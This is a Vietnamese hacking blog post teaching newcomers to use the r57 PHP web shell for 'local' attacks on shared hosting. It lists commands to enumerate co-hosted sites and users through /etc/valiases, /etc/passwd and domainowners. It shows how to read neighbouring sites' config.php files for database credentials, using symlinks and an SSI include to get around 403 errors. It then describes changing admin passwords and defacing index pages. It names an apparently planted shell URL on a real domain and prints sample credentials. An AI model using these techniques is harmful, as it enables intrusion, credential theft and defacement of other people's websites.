Trang

Tản mạn về Local (R57)


I. Cơ bản về r57.

1. Các thông tin ta có thể thấy đc qua shell.

- Safe-mode: On => Đây là chức năng bảo mật bật. Cái này chỉ có 2 kiểu là bật (on) và tắt (off) (đương nhiên) và rõ ràng là khi dùng shell thì vớ phải thằng safe-mode off dễ ăn hơn thằng on.

- PHP version: 4.4.6 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: ON Oracle: OFF => Đây là các chức năng của trang web đc bật hay tắt ( nhìn thì tự biết ).

- Disable functions: Đây là các hàm nó cấm ko cho sử dụng. Nếu là NONE thì nó chẳng cấm thằng nào. Còn như ở ví dụ trên nó cấm sử dụng các hàm : ini_alter,system,passthru,shell_exec,leak,listen,c hgrp,apache_setenv,define_syslog_variables,openlog ,syslog,ftp_exec.

- HDD Free : 85.49 GB HDD Total : 4733.08 GB => cái lày có cần nói ko nhỉ ???
- Ở cái hộp ngay bên dưới có quả "uname -a : Linux v8 2.6.18.1-grsec+e+f6b+gr219+opt+c4a+gr2b-grsec #1 SMP Thu Oct 19 12:50:29 PDT 2006 i686 GNU/Linux" => Thằng này nó dùng hệ điều hành GNU/Linux ( Chả hiểu j` nhưng thấy trên mấy trang cho tải hđh linux hay có cái GNU này )

- pwd : /home/.orzo/myebuddy/MY-IDIR.COM ( drwxr-xr-x ) => Mình đang ở trong thư mục /home/.orzo/myebuddy/MY-IDIR.COM. Còn cái drwxr-xr-x là mấy cái quyền của mình ở trong thư mục này đã đc thằng admin nó chmod từ trước ( ko biết đã chính xác chưa ).

- Và còn 1 ô ở ngay dưới rất hoành tá tràng là "Executed command", ở đó bao gồm có 10 cột nhưng chỉ cần chú ý nhất vào 2 cột đó là cột thứ 2 và cột thứ 10.

+ Cột thứ 2 : Nó ghi các quyền của mình có thể làm đc j` với file hoặc thư mục ở cột thứ 10. VD: drwxrwxrwx => chmod 777 hay còn gọi là owner user tức là toàn quyền với file hoặc thư mục đó nhưng gặp đc cái thằng như thế này có lẽ chỉ vài lần trong đời

+ Cột thứ 10 : Nó liệt kê các file và thư mục trong cái thư mục cắm con shell ( ở đây là /home/.orzo/myebuddy/MY-IDIR.COM ) và tất nhiên sẽ thấy luôn cả con shell
2. Làm việc trong r57.

- Run command (ngay dòng đầu tiên) : ô này để đánh các lệnh để chạy shell trong trường hợp này là các lệnh trong linux (cái này thì phải tìm hiểu). Nếu shell nó thông báo là server bật chế độ bảo mật (safe-mode on) thì dòng này sẽ ko có.

- Work directory : Đây là nơi mình đang làm việc (con shell đang ở trong thư mục này). Ở dòng này các bạn chỉ đánh đc tên của các thư mục mà mình muốn vào, còn muốn sem file hay chỉnh sửa file thì phải dùng đến dòng bên dưới. Trong trường hợp này mình đang làm việc trong thư mục và /home/.orzo/myebuddy/MY-IDIR.COM. Nếu bạn muốn vào thư mục daulom thì cần phải đánh /home/.orzo/myebuddy/MY-IDIR.COM/daulom rùi ấn vào Execute.

- File for edit : Nếu bạn muốn sem hoặc sửa 1 file ( mình khoái nhất là sửa file index ) thì sẽ đánh tên file đó vào. Ví dụ bạn muốn sửa file index.html ở trường hợp này bạn cần đánh /home/.orzo/myebuddy/MY-IDIR.COM/index.html rồi ấn vào edit file. Tuyệt đối ko nên nhầm lẫn thằng này với thằng work directory ở bên trên. Cần hiểu rõ rằng thằng này chỉ dung để đọc hoặc sửa file, còn thằng bên trên thì chỉ dung để đi ra hoặc vào 1 thư mục.

- Mấy cái find fủng với upload ở bên dưới thì bạn tự hiểu nhá.
- Đến phần Database:
+ Ô login : Điền dbuser.
+ Password: Điền dbpass.
+ Database: Điền dbname.
Muốn có những thong tin để điền vào mấy cái ông bên dưới này thì phải tự tìm hiểu thôi, mình cũng chẳng biết hướng dẫn thế nào nữa .

II. Local hack.

Hờ, cái này thì cũng đơn giản thôi, ko quá khó như mọi người vẫn tưởng ( theo bác backdoor là kiểu hack dễ nhất ). Cái thể loại local chỉ đơn giản như ở trong win chuyển từ thư mục này sang thư mục khác thôi. Trên server mỗi trang web nằm trong các thư mục khác nhau. Bạn chỉ việc chuyển từ thư mục đang có con shell sang 1 thư mục bên ngoài khác (cái này đọc kĩ phần Work directory nhá) rồi tự nhiên thấy 1 user của 1 trang web nào đó rồi đi vào thư mục đấy rồi vào phần edit, sửa lại cái index rồi ... Thế là xong!

Leech @HuynhHoaTieuTran

[Hacking] Cách dùng shell hacklocal + 1 số lệnh cơ bản


Đầu tiên mình nói qua qua về hack local tức là hack 1 website(host)nào đó có dùng host chạy chung 1 server

Ví dụ a e muốn hack 1 site nào đó a -e fai check xem nó nằm ở server nào,và nhưng web nào có cùng chạy trên server đó...và khai thác các site cùng server đó xem site nào lỗi để mình có thể thực hiện đc ý đồ ở đây là upload đc công cụ hack của mình lên.
Hiện nay mình thấy dùng Shell là thông dụng nhất , Nếu có host cùng sever với bọn nó thì càng tốt ,up con shell lên host của mình để local sang

Dưới đây là 1 số lệnh khi sử dụng shell
Xem tên domain trên cùng 1 host

ls -la /etc/valiases
cd /etc/vdomainaliases;ls -lia

Trường hợp đặc biệt khi không thể xem user nằm cùng host thì ta thêm && vào

cd /etc/vdomainaliases && ls -lia

+ Muốn biết tên user thì xài lệnh này :

cat /etc/passwd/

Hoặc

less /etc/passwd

+ Local sang victim
vd con shell mình là :

/home/abcd/public_html/

thì mình sẽ local sang nhu sau :

dir home/tên usercần local/public_html

+Xem nội dung của file

cat /home/tên user cần local/public_html/index.php

hoặc Ví dụ mình muốn xem config của 1 forum thì dùng
ln -s /home/tên user cần local/public_html/forum/includes/config.php abc.txt <-- abc.txt ở đây là file bạn tạo ra trên host của bạn để xem file của người khác !

Nếu bạn sử dụng không được các lệnh trên tức là server đã disable chức năng đó. Sẽ update thêm

Thêm 1 số lệnh shell trong linux

- pwd: đưa ra ngoài màn hình thư mục đang hoạt động (ví dụ: /etc/ssh).
- cd: thay đổi thư mục (ví dụ: cd .. – ra một cấp thư mục hiện tại; cd vidu – vào thư mục /vidu).
- ls: đưa ra danh sách nội dung thư mục.
- mkdir: tạo thư mục mới (mkdir tên_thumuc).
- touch: tạo file mới (touch ten_file).
- rmdir: bỏ một thư mục (rmdir ten_thumuc).
- cp: copy file hoặc thư mục (cp file_nguồn file_đích).
- mv: di chuyển file hoặc thư mục; cũng được dùng để đặt lại tên file hoặc thư mục (mv vị_trí_cũ vị_trí_mới hoặc mv tên_cũ tên_mới).
- rm: loại bỏ file (rm tên_file).
Để tìm kiếm file, bạn có thể dùng:
- find : dùng cho các tên file.
- grep < tiêu chuẩn tìm kiếm>: để tìm nội dung trong file.
Để xem một file, bạn có thể dùng:
- more : hiển thị file theo từng trang.
- cat < tên file>: hiển thị tất cả file.
----------------------------------------------------------------------

Bài viết dưới đây mình có nhờ 1 số tài liệu của mấy bạn khác, và mình đã bổ sung để hoàn thiện hơn cho các bạn

TUT local dạng cơ bản:

Hôm nay mình mạn phép viết 1 bài, dù mình rất gà, nhưng cũng xin viết tut cho những bạn như mình

Bây giờ, giả sử như ta chưa có shell đúng không, muốn attack 1 site có nhiều cách, nhưng những cách sau newbie tụi mình hay làm:

1) Tìm bug ngay trên victim
2) Nếu victim ko có bug, ta tìm site cùng server local chơi mình đang muốn nói cách 2 trong topic này, giả sử victim của ta ko có bug, làm gì đây?
Mình sẽ whois xem hàng xóm của nó thử coi.

Chắc chắn các bạn sẽ thấy nhiếu site, ta tìm bug trên từng site, sau đó tìm cách up 1 con shell để local, giả sử mình tìm được 1 thằng nào đó có bug, up được shell rồi thì chơi thôi, ví dụ con shell:

http://2dalat.com/b/img/ini.php

Mình bắt đầu với lệnh
cd /etc/valiases && ls -lia
Trường hợp không dùng được lệnh này thì ta có thể dúng trong 2 lệnh (đối vs Cpanel):

cat /etc/passwd
less /etc/passwd
Và đối với Directadmin:

cat /etc/virtual/domainowners
Lệnh này tìm user cùng site của user đó
khi nó hiện ra, ta tìm victim cần local
Giả sử ta có user "yeubz":

Trường hợp 1:

dir /home/yeubz/public_html/
Sau khi ta vào được thư mục, thì ta thấy các thư mục, các file, tệp, dùng lệnh này để đọc, vidụ như :

cat /home/yeubz/public_html/abc/config.php
ở đây nếu file ko bị chmod kĩ, thì ta có thể đọc được info trong đó vd:

<?php
$db_config=array("host"=>"localhost","port"=>"",
"user"=>"demo",
"pass"=>"123456","database"=>"qanh_quanganh");
$common_config=array();
$common_config['product_per_page']="12";
$common_config['member_per_page']="10";
$common_config['guestbook_per_page']="5";
$common_config['support_email']="support@quanganh.com.vn";
$common_config['contact_email']="info@quanganh.com.vn";
$common_config['sales_email']="sales@quanganh.com.vn";
$common_config['axiom_per_member']="10";
$common_config['stories_per_page']="5";
$common_config['page_per_page']="10";
$common_config['diary_per_page']="5";
$common_config['num_free_picture']="10";
$common_config['allow_free_planner']="1";
?>
Khi các bạn có info của data, thì mình connect tới SQL, điền đầy đủ thông tin.

Tới đây thì có rất nhiều hướng giải quyết, nhưng thông dụng nhất vẫn là edit pass của thằng Admin ( thường thì sẽ là md5)

Trường hợp 2:

Nếu không dir, cat gì được thì ta có thể dùng lệnh sau:

ln -s /home/yeubz/public_html/abc/config.php 1.txt
Lúc đó file config của victim sẽ được tạo ra dưới với tên 1.txt . Nếu mở lên mà bị lỗi 403 thì cũng đừng nãn. Ta sẽ tiếp tục:
Save code này thành file.shtml và up lên.

<!--#include virtual="1.txt"-->
Ở chổ 1.txt các bạn có thể thay đổi tên sau cho trùng với cái file bạn tạo ra ở câu lệnh ln -s. Sau đó thì run nó. Nếu nó hiện ra file config thì quá ngon rồi còn nếu không hiện gì thì cũng đừng buồn, thử Ctrl + U xem

Đây chỉ là 2 cách cực kì cơ bản đối với những server "gà mờ". Sau này mình sẽ hướng dẫn nâng cao cho các bạn, đối với newbie thôi nhé, ai pro thì cũng đừng nên ném gạch nha, em chưa muốn xây nhà

Chú Ý:

Coppy phải ghi rõ nguồn Dương-UG Blog's
 

0 nhận xét:

Đăng nhận xét

:) :( :)) :(( =))

Copyright © Dương-UG Blog's - Nguyễn Bình Dương